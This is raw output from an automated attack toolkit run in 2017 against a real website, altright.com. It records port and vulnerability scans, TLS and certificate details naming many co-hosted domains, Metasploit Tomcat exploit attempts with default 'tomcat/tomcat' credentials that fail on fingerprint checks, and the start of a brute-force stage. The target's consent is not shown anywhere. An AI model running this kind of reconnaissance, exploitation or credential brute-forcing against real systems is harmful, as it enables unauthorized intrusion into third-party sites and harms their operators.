- set-cookie: wfvt_2729720346=59cce75c651aa; expires=Thu, 28-Sep-2017 12:43:16 GMT; Max-Age=1800; path=/; secure; httponly
- + -- --=[Checking for ASP.NET Detailed Errors on altright.com...
- .kid-author-box .author-info .kid-author-page-contact a:hover, .error-number h1, #kid-404-wrap .kid-error-title,
- <body class="error404">
- <img src="https://altright.com/wp-content/themes/sterling-child/img/altright-logo.svg" alt="AltRight.com" width="430" height="45" alt="AltRight.com" onerror="this.removeAttribute('onerror'); this.src='https://altright.com/wp-content/themes/sterling-child/img/altright-logo.png'" />
- <div class="error-number">
- <h4 class="kid-error-title">Page not found</h4>
- .kid-author-box .author-info .kid-author-page-contact a:hover, .error-number h1, #kid-404-wrap .kid-error-title,
- <body class="error404">
- <img src="https://altright.com/wp-content/themes/sterling-child/img/altright-logo.svg" alt="AltRight.com" width="430" height="45" alt="AltRight.com" onerror="this.removeAttribute('onerror'); this.src='https://altright.com/wp-content/themes/sterling-child/img/altright-logo.png'" />
- <div class="error-number">
- <h4 class="kid-error-title">Page not found</h4>
- + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.179.91
- + Target Hostname: altright.com
- + Target Port: 443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni190556.cloudflaressl.com
- Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
- + Start Time: 2017-09-28 08:13:18 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3a569db228f22216-EWR
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Hostname 'altright.com' does not match certificate's names: sni190556.cloudflaressl.com
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
- at /var/lib/nikto/plugins/LW2.pm line 5157.
- ; at /var/lib/nikto/plugins/LW2.pm line 5157.
- + Scan terminated: 20 error(s) and 5 item(s) reported on remote host
- + End Time: 2017-09-28 08:14:11 (GMT-4) (53 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
- [+] Screenshot saved to /usr/share/sniper/loot/screenshots/altright.com-port443.jpg
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 623 closed... skipping.
- + -- --=[Port 624 closed... skipping.
- + -- --=[Port 1099 closed... skipping.
- + -- --=[Port 1433 closed... skipping.
- + -- --=[Port 2049 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 closed... skipping.
- + -- --=[Port 3310 closed... skipping.
- + -- --=[Port 3128 closed... skipping.
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 3632 closed... skipping.
- + -- --=[Port 4443 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5984 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://altright.com:8080
- The site http://altright.com:8080 is behind a CloudFlare
- Number of requests: 1
- http://altright.com:8080 [301 Moved Permanently] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.27.179.91], RedirectLocation[https://altright.com/], UncommonHeaders[cf-ray]
- https://altright.com/ [200 OK] CloudFlare, Cookies[__cfduid,wfvt_2729720346], Country[UNITED STATES][US], Google-Analytics[Universal][UA-90381947-1], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid,wfvt_2729720346], IP[104.27.179.91], MetaGenerator[WordPress 4.8.2], Open-Graph-Protocol[website], PHP[5.6.31], Script[application/javascript,text/javascript], Title[AltRight.com], UncommonHeaders[link,cf-ray], WordPress[4.8.2], X-Powered-By[PHP/5.6.31]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: altright.com:8080
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Date: Thu, 28 Sep 2017 12:14:24 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- Server: -nginx
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- HTTP/1.1 301 Moved Permanently
- Date: Thu, 28 Sep 2017 12:14:25 GMT
- Transfer-Encoding: chunked
- Connection: keep-alive
- Cache-Control: max-age=3600
- Expires: Thu, 28 Sep 2017 13:14:25 GMT
- Location: https://altright.com/
- Server: cloudflare-nginx
- CF-RAY: 3a569f5165c81043-CDG
- 0
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server altright.com on port 8080 using SNI name altright.com
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Scan Complete!
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.179.91
- + Target Hostname: altright.com
- + Target Port: 8080
- + Start Time: 2017-09-28 08:14:27 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3a569f61e6483c47-CDG
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
- + 26101 requests: 1 error(s) and 3 item(s) reported on remote host
- + End Time: 2017-09-28 11:39:53 (GMT-4) (12326 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 11:40 EDT
- Nmap scan report for altright.com (104.27.178.91)
- Host is up (0.15s latency).
- Other addresses for altright.com (not scanned): 2400:cb00:2048:1::681b:b35b 2400:cb00:2048:1::681b:b25b 104.27.179.91
- PORT STATE SERVICE VERSION
- 8080/tcp open http Cloudflare nginx
- |_http-server-header: cloudflare-nginx
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running (JUST GUESSING): Linux 3.X|2.6.X (88%)
- OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 8 hops
- TRACEROUTE (using port 8080/tcp)
- HOP RTT ADDRESS
- 1 153.60 ms 10.13.0.1
- 2 162.63 ms 37.187.24.252
- 3 158.17 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 ...
- 5 261.49 ms be99-1106.gsw-1-a9.fr.eu (91.121.215.177)
- 6 261.53 ms be99-2.th2-1-a9.fr.eu (37.187.36.214)
- 7 174.49 ms equinix-paris.cloudflare.com (195.42.144.143)
- 8 168.96 ms 104.27.178.91
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 35.24 seconds
- # cowsay++
- ____________
- < metasploit >
- ------------
- \ ,__,
- \ (oo)____
- (__) )\
- ||--|| *
- =[ metasploit v4.16.8-dev ]
- + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
- resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
- [-] Unknown command: “spool.
- RHOST => altright.com
- [-] WAR file not found
- [*] Auxiliary module execution completed
- RHOSTS => altright.com
- [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => altright.com
- RPORT => 8080
- [*] Scanned 1 of 4 hosts (25% complete)
- [*] Scanned 2 of 4 hosts (50% complete)
- [*] Scanned 3 of 4 hosts (75% complete)
- [*] Scanned 4 of 4 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 2400:cb00:2048:1::681b:b25b:8080
- [+] No File(s) found
- [*] Scanned 1 of 4 hosts (25% complete)
- [*] Attempting to connect to 2400:cb00:2048:1::681b:b35b:8080
- [+] No File(s) found
- [*] Scanned 2 of 4 hosts (50% complete)
- [*] Attempting to connect to 104.27.179.91:8080
- [+] No File(s) found
- [*] Scanned 3 of 4 hosts (75% complete)
- [*] Attempting to connect to 104.27.178.91:8080
- [+] No File(s) found
- [*] Scanned 4 of 4 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] 2400:cb00:2048:1::681b:b25b:8080 -
- [*] 2400:cb00:2048:1::681b:b25b:8080 -
- [-] http://2400:cb00:2048:1::681b:b25b:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 1 of 4 hosts (25% complete)
- [*] 2400:cb00:2048:1::681b:b35b:8080 -
- [*] 2400:cb00:2048:1::681b:b35b:8080 -
- [-] http://2400:cb00:2048:1::681b:b35b:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 2 of 4 hosts (50% complete)
- [*] 104.27.179.91:8080 -
- [*] 104.27.179.91:8080 -
- [-] http://104.27.179.91:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 3 of 4 hosts (75% complete)
- [*] 104.27.178.91:8080 -
- [*] 104.27.178.91:8080 -
- [-] http://104.27.178.91:8080/admin/j_security_check - Unable to enumerate users with this URI
- [*] Scanned 4 of 4 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] 2400:cb00:2048:1::681b:b25b:8080 -
- [*] Scanned 1 of 4 hosts (25% complete)
- [-] 2400:cb00:2048:1::681b:b35b:8080 -
- [*] Scanned 2 of 4 hosts (50% complete)
- [-] 104.27.179.91:8080 -
- [*] Scanned 3 of 4 hosts (75% complete)
- [-] 104.27.178.91:8080 -
- [*] Scanned 4 of 4 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [-] Exploit aborted due to failure: not-found: The target server fingerprint "cloudflare-nginx ( 403-Forbidden )" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://altright.com:8443
- The site http://altright.com:8443 is behind a CloudFlare
- Number of requests: 1
- http://altright.com:8443 [400 Bad Request] CloudFlare, Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], IP[104.27.179.91], Title[400 The plain HTTP request was sent to HTTPS port], UncommonHeaders[cf-ray]
- __ ______ _____
- \ \/ / ___|_ _|
- \ /\___ \ | |
- / \ ___) || |
- /_/\_|____/ |_|
- + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
- + -- --=[Target: altright.com:8443
- + -- --=[Site not vulnerable to Cross-Site Tracing!
- + -- --=[Site not vulnerable to Host Header Injection!
- + -- --=[Site vulnerable to Cross-Frame Scripting!
- + -- --=[Site vulnerable to Clickjacking!
- HTTP/1.1 405 Not Allowed
- Server: cloudflare-nginx
- Date: Thu, 28 Sep 2017 15:43:31 GMT
- Content-Type: text/html
- Content-Length: 177
- Connection: close
- CF-RAY: -
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- HTTP/1.1 400 Bad Request
- Server: cloudflare-nginx
- Date: Thu, 28 Sep 2017 15:43:32 GMT
- Content-Type: text/html
- Content-Length: 275
- Connection: close
- CF-RAY: -
- <html>
- <head><title>400 The plain HTTP request was sent to HTTPS port</title></head>
- <body bgcolor="white">
- <center><h1>400 Bad Request</h1></center>
- <center>The plain HTTP request was sent to HTTPS port</center>
- <hr><center>cloudflare-nginx</center>
- </body>
- </html>
- Version: 1.11.10-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Testing SSL server altright.com on port 8443 using SNI name altright.com
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA384 Curve P-256 DHE 256
- Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- Preferred TLSv1.0 128 bits ECDHE-ECDSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-ECDSA-AES256-SHA Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: ecdsa-with-SHA256
- Subject: sni190556.cloudflaressl.com
- Altnames: DNS:sni190556.cloudflaressl.com, DNS:*.444ttg.com, DNS:*.66ddl.com, DNS:*.6yyl.com, DNS:*.altright.com, DNS:*.arktos.com, DNS:*.biseznamka.com, DNS:*.deitti-sivut.com, DNS:*.dsfredmdtom.cf, DNS:*.eggendk.cf, DNS:*.embroiddesigns.net, DNS:*.foragerproject.com, DNS:*.huntingdonmcdonalds.com, DNS:*.jomsey.altervista.org, DNS:*.joyeati.cf, DNS:*.lewfi.stream, DNS:*.minnehaha-kendo.org, DNS:*.minnehahakendodojo.org, DNS:*.mujeresbolivia.com, DNS:*.punkchat.co.za, DNS:*.smart-eas.ru, DNS:*.spankingchat.ca, DNS:*.teacoal.xyz, DNS:444ttg.com, DNS:66ddl.com, DNS:6yyl.com, DNS:altright.com, DNS:arktos.com, DNS:biseznamka.com, DNS:deitti-sivut.com, DNS:dsfredmdtom.cf, DNS:eggendk.cf, DNS:embroiddesigns.net, DNS:foragerproject.com, DNS:huntingdonmcdonalds.com, DNS:jomsey.altervista.org, DNS:joyeati.cf, DNS:lewfi.stream, DNS:minnehaha-kendo.org, DNS:minnehahakendodojo.org, DNS:mujeresbolivia.com, DNS:punkchat.co.za, DNS:smart-eas.ru, DNS:spankingchat.ca, DNS:teacoal.xyz
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Not valid before: Aug 12 00:00:00 2017 GMT
- Not valid after: Feb 18 23:59:59 2018 GMT
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginOpenSSLCipherSuites
- PluginCertInfo
- PluginHSTS
- PluginHeartbleed
- PluginCompression
- PluginChromeSha1Deprecation
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- altright.com:8443 => 2400:cb00:2048:1::681b:b35b:8443
- SCAN RESULTS FOR ALTRIGHT.COM:8443 - 2400:CB00:2048:1::681B:B35B:8443
- ---------------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 3af38101a73a8494677d499017a4e3efdd1904b5
- Common Name: sni190556.cloudflaressl.com
- Issuer: COMODO ECC Domain Validation Secure Server CA 2
- Serial Number: 6DBD6BD78F91E08014D6D046DB20B529
- Not Before: Aug 12 00:00:00 2017 GMT
- Not After: Feb 18 23:59:59 2018 GMT
- Signature Algorithm: ecdsa-with-SHA256
- Public Key Algorithm: id-ecPublicKey
- Key Size: 256 bit
- X509v3 Subject Alternative Name: {'DNS': ['sni190556.cloudflaressl.com', '*.444ttg.com', '*.66ddl.com', '*.6yyl.com', '*.altright.com', '*.arktos.com', '*.biseznamka.com', '*.deitti-sivut.com', '*.dsfredmdtom.cf', '*.eggendk.cf', '*.embroiddesigns.net', '*.foragerproject.com', '*.huntingdonmcdonalds.com', '*.jomsey.altervista.org', '*.joyeati.cf', '*.lewfi.stream', '*.minnehaha-kendo.org', '*.minnehahakendodojo.org', '*.mujeresbolivia.com', '*.punkchat.co.za', '*.smart-eas.ru', '*.spankingchat.ca', '*.teacoal.xyz', '444ttg.com', '66ddl.com', '6yyl.com', 'altright.com', 'arktos.com', 'biseznamka.com', 'deitti-sivut.com', 'dsfredmdtom.cf', 'eggendk.cf', 'embroiddesigns.net', 'foragerproject.com', 'huntingdonmcdonalds.com', 'jomsey.altervista.org', 'joyeati.cf', 'lewfi.stream', 'minnehaha-kendo.org', 'minnehahakendodojo.org', 'mujeresbolivia.com', 'punkchat.co.za', 'smart-eas.ru', 'spankingchat.ca', 'teacoal.xyz']}
- * Certificate - Trust:
- Hostname Validation: OK - Subject Alternative Name matches
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['sni190556.cloudflaressl.com', 'COMODO ECC Domain Validation Secure Server CA 2', 'COMODO ECC Certification Authority']
- * Certificate - OCSP Stapling:
- OCSP Response Status: successful
- Validation w/ Mozilla's CA Store: OK - Response is trusted
- Responder Id: 40096167F0BC83714FDE12082C6FD4D42B763D96
- Cert Status: good
- Cert Serial Number: 6DBD6BD78F91E08014D6D046DB20B529
- This Update: Sep 24 23:54:56 2017 GMT
- Next Update: Oct 1 23:54:56 2017 GMT
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 0.63 S
- ------------------------
- ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄
- ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
- ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
- ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
- ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓
- ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒
- ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒
- ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
- ░ ░
- + -- --=[MÄŚŚBĻËËĐ V20160303 BŸ 1Ņ3 @ ĊŖÖŴĐŚȞÏËĻĐ - https://crowdshield.com
- + -- --=[Scan Complete!
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 104.27.178.91
- + Target Hostname: altright.com
- + Target Port: 8443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni190556.cloudflaressl.com
- Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO ECC Domain Validation Secure Server CA 2
- + Start Time: 2017-09-28 11:43:36 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: cloudflare-nginx
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + Uncommon header 'cf-ray' found, with contents: 3a57d1bc989d1870-EWR
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + All CGI directories 'found', use '-C none' to test none
- + Hostname 'altright.com' does not match certificate's names: sni190556.cloudflaressl.com
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: SSL negotiation failed: error:14094410:SSL routines:ssl3_read_bytes:sslv3 alert handshake failure at /var/lib/nikto/plugins/LW2.pm line 5157.
- at /var/lib/nikto/plugins/LW2.pm line 5157.
- ; at /var/lib/nikto/plugins/LW2.pm line 5157.
- + Scan terminated: 18 error(s) and 5 item(s) reported on remote host
- + End Time: 2017-09-28 11:45:22 (GMT-4) (106 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 11:45 EDT
- Nmap scan report for altright.com (104.27.179.91)
- Host is up (0.12s latency).
- Other addresses for altright.com (not scanned): 2400:cb00:2048:1::681b:b25b 2400:cb00:2048:1::681b:b35b 104.27.178.91
- PORT STATE SERVICE VERSION
- 8443/tcp open ssl/http Cloudflare nginx
- |_http-server-header: cloudflare-nginx
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running (JUST GUESSING): Linux 3.X|2.6.X (88%)
- OS CPE: cpe:/o:linux:linux_kernel:3.18 cpe:/o:linux:linux_kernel:2.6
- Aggressive OS guesses: Linux 3.18 (88%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 8 hops
- TRACEROUTE (using port 8443/tcp)
- HOP RTT ADDRESS
- 1 111.09 ms 10.13.0.1
- 2 111.77 ms 37.187.24.252
- 3 111.75 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
- 4 113.26 ms 10.95.33.8
- 5 115.75 ms be99-1106.gsw-1-a9.fr.eu (91.121.215.177)
- 6 222.39 ms be99-2.th2-1-a9.fr.eu (37.187.36.214)
- 7 222.37 ms cloudflare.par.franceix.net (37.49.237.49)
- 8 116.08 ms 104.27.179.91
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 40.64 seconds
- + -- --=[Port 8888 closed... skipping.
- + -- --=[Port 10000 closed... skipping.
- + -- --=[Port 16992 closed... skipping.
- + -- --=[Port 27017 closed... skipping.
- + -- --=[Port 27018 closed... skipping.
- + -- --=[Port 27019 closed... skipping.
- + -- --=[Port 28017 closed... skipping.
- + -- --=[Port 49152 closed... skipping.
- + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
- #######################################################################################################################################
- oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
- `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
- `888. .8' .88888. Y88bo. 888 8 888 888
- `888.8' .8' `888. `ZY8888o. 888 8 888 888
- `888' .88ooo8888. `0Y88b 888 8 888 888
- 888 .8' `888. oo .d8P `88. .8' `88b d88'
- o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #######################################################################################################################################
- I, [2017-09-28T11:46:35.506925 #3300] INFO -- : Initiating port scan
- I, [2017-09-28T11:47:32.368290 #3300] INFO -- : Using nmap scan output file logs/nmap_output_2017-09-28_11-46-35.xml
- I, [2017-09-28T11:47:32.369603 #3300] INFO -- : Discovered open port: 104.27.178.91:80
- I, [2017-09-28T11:47:33.205844 #3300] INFO -- : Discovered open port: 104.27.178.91:443
- I, [2017-09-28T11:47:33.861767 #3300] INFO -- : Discovered open port: 104.27.178.91:8080
- I, [2017-09-28T11:47:34.763697 #3300] INFO -- : Discovered open port: 104.27.178.91:8443
- W, [2017-09-28T11:47:35.417718 #3300] WARN -- : Yasuo did not find any potential hosts to enumerate
- + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +
- + -- ----------------------------=[Running Brute Force]=--------------------- -- +
- __________ __ ____ ___
- \______ \_______ __ ___/ |_ ____ \ \/ /
- | | _/\_ __ \ | \ __\/ __ \ \ /
- | | \ | | \/ | /| | \ ___/ / \
- |______ / |__| |____/ |__| \___ >___/\ \
- \/ \/ \_/
- + -- --=[BruteX v1.7 by 1N3
- + -- --=[http://crowdshield.com
- ################################### Running Port Scan #################################################################################
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-28 11:47 EDT
- Nmap scan report for altright.com (104.27.179.91)
- Host is up (0.13s latency).
- Other addresses for altright.com (not scanned): 2400:cb00:2048:1::681b:b25b 2400:cb00:2048:1::681b:b35b 104.27.178.91
- Not shown: 23 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 8080/tcp open http-proxy
- Nmap done: 1 IP address (1 host up) scanned in 13.96 seconds
- ################################### Running Brute Force ###############################################################################
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
